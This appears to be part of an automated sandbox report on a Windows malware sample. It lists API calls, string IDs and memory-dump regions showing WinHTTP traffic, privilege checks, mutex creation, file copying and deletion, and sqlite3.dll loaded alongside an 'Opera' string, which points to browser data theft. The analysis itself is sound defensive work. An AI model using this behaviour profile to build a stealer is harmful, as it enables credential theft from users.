                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 00433735
                                                          • CloseHandle.KERNEL32(00000000), ref: 0043373F
                                                          • WinHttpCloseHandle.WINHTTP(00000000), ref: 00433746
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
                                                          • String ID: $LPPTW$%99[^:]://%99[^/]%99[^]$GET
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043303A
                                                          • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047913B,00000000), ref: 00433083
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?,?,?,?,0047913B,00000000), ref: 00433150
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004379C6
                                                            • Part of subcall function 004379A1: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004379FB
                                                          • WinHttpConnect.WINHTTP(00000000,00000000,00000050,00000000,?,?,?,?,0047913B,00000000), ref: 004331A4
                                                          • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047913B,00000000), ref: 00433227
                                                          • WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047913B,00000000), ref: 00433299
                                                          • _strlen.LIBCMT ref: 004332C7
                                                          • _strlen.LIBCMT ref: 004332D1
                                                          • WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047913B,00000000), ref: 004332E8
                                                          • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047913B,00000000), ref: 004332FA
                                                          • WinHttpQueryDataAvailable.WINHTTP(00000000,?,?,?,?,0047913B,00000000), ref: 00433312
                                                          • WinHttpReadData.WINHTTP(00000000,00000000,?,?,?,?,?,?,?,?,0047913B,00000000), ref: 00433347
                                                          • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047913B,00000000), ref: 004333F1
                                                          • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047913B,00000000), ref: 004333FB
                                                          • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047913B,00000000), ref: 00433402
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableH_prologQueryReadReceiveResponseSend
                                                          • String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8$W?##'$
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000008,?), ref: 00437B3E
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00437B45
                                                          • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00437B5F
                                                          • GetLastError.KERNEL32 ref: 00437B69
                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00437B79
                                                          • GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00437B8D
                                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437BA1
                                                          • GlobalFree.KERNEL32(00000000), ref: 00437BC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Token$GlobalInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                          • String ID: S-1-5-18
                                                          • API String ID: 857934279-4289277601
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0027024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040CB66
                                                            • Part of subcall function 00434A6B: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434AB7
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                          • LoadLibraryA.KERNEL32(00000000), ref: 0040CBA3
                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040CBDB
                                                          • lstrcatW.KERNEL32 ref: 0040CC1E
                                                            • Part of subcall function 00409290: __EH_prolog.LIBCMT ref: 00409295
                                                            • Part of subcall function 00409290: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0000002A,?,00000000), ref: 004093AD
                                                            • Part of subcall function 00409290: HeapFree.KERNEL32(00000000,?,?), ref: 004093B4
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040D1D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcatlstrcat
                                                          • String ID: Opera$sqlite3.dll
                                                          • API String ID: 1063041688-285176451
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043781E
                                                          • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,00000000,00000000), ref: 0043789F
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 004378EE
                                                          • RegCloseKey.ADVAPI32(?), ref: 0043790F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CloseH_prologOpenQueryValue
                                                          • String ID: @
                                                          • API String ID: 1233982722-2766056989
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-
                                                          • API String ID: 0-2084034818
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2433229096.00000000047F3000.00000080.00020000.sdmp, Offset: 047F3000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __alloca_probe_16.LIBCMT ref: 0045C49C
                                                          • __alloca_probe_16.LIBCMT ref: 0045C562
                                                          • __freea.LIBCMT ref: 0045C5CE
                                                            • Part of subcall function 00458BEE: RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          • __freea.LIBCMT ref: 0045C5D7
                                                          • __freea.LIBCMT ref: 0045C5FA
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1423051803-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                          • _free.LIBCMT ref: 00456C8D
                                                          • _free.LIBCMT ref: 00456CC3
                                                          • SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,0000000F,00000000,00408E93), ref: 00408F45
                                                          • DeleteFileTransactedA.KERNEL32(?,00000000), ref: 00408F5C
                                                          • CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F67
                                                          • RollbackTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F6F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Transaction$CommitCreateDeleteFileRollbackTransacted
                                                          • String ID:
                                                          • API String ID: 3802493581-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040EE51
                                                            • Part of subcall function 0040F661: __EH_prolog.LIBCMT ref: 0040F666
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: MA$mA
                                                          • API String ID: 3519838083-3130508977
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0046001E
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0046008C
                                                            • Part of subcall function 0045A58E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045C5C4,?,00000000,00000000), ref: 0045A630
                                                            • Part of subcall function 00458BEE: RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          • _free.LIBCMT ref: 0046007D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                          • String ID:
                                                          • API String ID: 2560199156-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleMappingView
                                                          • String ID:
                                                          • API String ID: 1187395538-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040E014
                                                            • Part of subcall function 0040EE4C: __EH_prolog.LIBCMT ref: 0040EE51
                                                            • Part of subcall function 0040F61A: __EH_prolog.LIBCMT ref: 0040F61F
                                                            • Part of subcall function 0040F61A: std::locale::_Init.LIBCPMT ref: 0040F63D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Initstd::locale::_
                                                          • String ID: UA
                                                          • API String ID: 1266419734-558053890
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040F666
                                                            • Part of subcall function 0040F6B7: __EH_prolog.LIBCMT ref: 0040F6BC
                                                            • Part of subcall function 0040F6B7: std::locale::_Init.LIBCPMT ref: 0040F704
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Initstd::locale::_
                                                          • String ID: ]A
                                                          • API String ID: 1266419734-793799610
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408D71
                                                            • Part of subcall function 0040FA2B: __EH_prolog.LIBCMT ref: 0040FA30
                                                          Strings
                                                          • recursive_directory_iterator::recursive_directory_iterator, xrefs: 00408DAB
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: recursive_directory_iterator::recursive_directory_iterator
                                                          • API String ID: 3519838083-3545205060
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InitializeCriticalSectionAndSpinCount.KERNELBASE(00000000,00000FA0,00488070,00000FA0,00000000,?,00485538,00000008,0040F7EF,?,?,00407474), ref: 00458743
                                                          Strings
                                                          • InitializeCriticalSectionEx, xrefs: 00458713
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CountCriticalInitializeSectionSpin
                                                          • String ID: InitializeCriticalSectionEx
                                                          • API String ID: 2593887523-3084827643
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Alloc
                                                          • String ID: FlsAlloc
                                                          • API String ID: 2773662609-671089009
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_fs_set_current_path@4.LIBCPMT ref: 00415F9A
                                                            • Part of subcall function 004085B0: __EH_prolog2.LIBCMT ref: 004085B7
                                                          Strings
                                                          • current_path(const path&), xrefs: 00415FA8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog2___std_fs_set_current_path@4
                                                          • String ID: current_path(const path&)
                                                          • API String ID: 2482923176-1163517728
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0045F911: GetOEMCP.KERNEL32(00000000,0045FB83,00000000,00000000,004509FC,004509FC,00000000,00000000,00000000), ref: 0045F93C
                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,0045FBCA,00000000,00000000,00000000,?,00000000,?,?,?,004509FC), ref: 0045FDDA
                                                          • GetCPInfo.KERNEL32(00000000,0045FBCA,?,?,0045FBCA,00000000,00000000,00000000,?,00000000,?,?,?,004509FC,00000000,00000000), ref: 0045FE1C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CodeInfoPageValid
                                                          • String ID:
                                                          • API String ID: 546120528-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00408B9E: ___std_fs_get_stats@16.LIBCPMT ref: 00408BE8
                                                          • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408CBC
                                                            • Part of subcall function 0043DCB1: FindNextFileW.KERNELBASE(?,?,?,00408867,?,?,?,?,?,004088F4,?,?,?,?,00000001), ref: 0043DCBA
                                                          • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408D1D
                                                            • Part of subcall function 0040883B: ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408862
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext___std_fs_get_stats@16
                                                          • String ID:
                                                          • API String ID: 224343835-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0045F911: GetOEMCP.KERNEL32(00000000,0045FB83,00000000,00000000,004509FC,004509FC,00000000,00000000,00000000), ref: 0045F93C
                                                          • _free.LIBCMT ref: 0045FBE0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00408878
                                                          • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 004088E1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog___std_fs_directory_iterator_open@12
                                                          • String ID:
                                                          • API String ID: 2120191866-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040F6BC
                                                            • Part of subcall function 00407AE5: std::system_error::system_error.LIBCPMT ref: 00407B53
                                                          • std::locale::_Init.LIBCPMT ref: 0040F704
                                                            • Part of subcall function 0043E56E: std::_Lockit::_Lockit.LIBCPMT ref: 0043E580
                                                            • Part of subcall function 0043E56E: std::locale::_Setgloballocale.LIBCPMT ref: 0043E59B
                                                            • Part of subcall function 0043E56E: _Yarn.LIBCPMT ref: 0043E5B1
                                                            • Part of subcall function 0043E56E: std::_Lockit::~_Lockit.LIBCPMT ref: 0043E5F1
                                                            • Part of subcall function 0040F779: __EH_prolog.LIBCMT ref: 0040F77E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prologLockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarnstd::system_error::system_error
                                                          • String ID:
                                                          • API String ID: 2895863627-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 0045D8AC
                                                            • Part of subcall function 00458BEE: RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,00460132,?,00000004,00000000,?,?,?,004542FC,?,00000000), ref: 0045D8E8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap$_free
                                                          • String ID:
                                                          • API String ID: 1482568997-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00434BE4: GetUserNameA.ADVAPI32(?,?), ref: 00434BFF
                                                          • OpenMutexA.KERNEL32 ref: 00434F56
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00434F63
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Mutex$CreateNameOpenUser
                                                          • String ID:
                                                          • API String ID: 1251385603-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEncodePointer.NTDLL(?,?,0043E713,0043E759,?,0043E5A0,00000000,00000000,00000000,00000004,0040F642,00000001,00000008,?,?,0040ED40), ref: 0043F111
                                                          • IsProcessorFeaturePresent.KERNEL32 ref: 00452545
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: EncodeFeaturePointerPresentProcessor
                                                          • String ID:
                                                          • API String ID: 4030241255-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CopyFileW.KERNEL32(?,?,1672BEA2), ref: 0043D9B6
                                                          • GetLastError.KERNEL32(?,0043DC40,?,00000000,00000000,1672BEA2,?), ref: 0043D9CC
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: CopyErrorFileLast
                                                          • String ID:
                                                          • API String ID: 374144340-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00442F01
                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00442F0C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                          • String ID:
                                                          • API String ID: 1660781231-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00270223,?,?), ref: 00270E02
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00270223,?,?), ref: 00270E07
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCPInfo.KERNEL32(E8458D00,?,0000000C,00000000,00000000), ref: 0045FA19
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID:
                                                          • API String ID: 1807457897-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040FA30
                                                            • Part of subcall function 0040891A: __EH_prolog.LIBCMT ref: 0040891F
                                                            • Part of subcall function 00408A68: __EH_prolog.LIBCMT ref: 00408A6D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00457F6D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00456DCD,00000001,00000364,00000006,000000FF,?,0044077E,00000002,00000000,?,?), ref: 00457FAE
                                                          • _free.LIBCMT ref: 0046034F
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040891F
                                                            • Part of subcall function 00408873: __EH_prolog.LIBCMT ref: 00408878
                                                            • Part of subcall function 00408873: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 004088E1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$___std_fs_directory_iterator_open@12
                                                          • String ID:
                                                          • API String ID: 1512400408-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 002207EE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432462370.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                          Similarity
                                                          • API ID: FirstModule32
                                                          • String ID:
                                                          • API String ID: 3757679902-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00456DCD,00000001,00000364,00000006,000000FF,?,0044077E,00000002,00000000,?,?), ref: 00457FAE
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,?,0048C4DC,00000000,?,00444220,00000004,InitializeCriticalSectionEx,004705E8,004705F0,00000000,?,00443FCD,0048C4DC,00000FA0,00000000), ref: 004440FF
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID:
                                                          • API String ID: 190572456-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0043E3AD,00000000,?,0044077E,00000002,00000000,?,?,?,004070D6,0043E3AD,00000004,00000000,00000000,00000000), ref: 00458C20
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_fs_copy_file@12.LIBCPMT ref: 00408E01
                                                            • Part of subcall function 0040860C: __EH_prolog2.LIBCMT ref: 00408613
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog2___std_fs_copy_file@12
                                                          • String ID:
                                                          • API String ID: 1952593469-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00408862
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ___std_fs_directory_iterator_advance@8
                                                          • String ID:
                                                          • API String ID: 2610647541-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • AreFileApisANSI.KERNEL32(00410AD1,?,?,0000000F,?,?,00414AB7,?,00000000), ref: 0043DA0C
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ApisFile
                                                          • String ID:
                                                          • API String ID: 4028452750-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 002204B6
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432462370.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00293A10
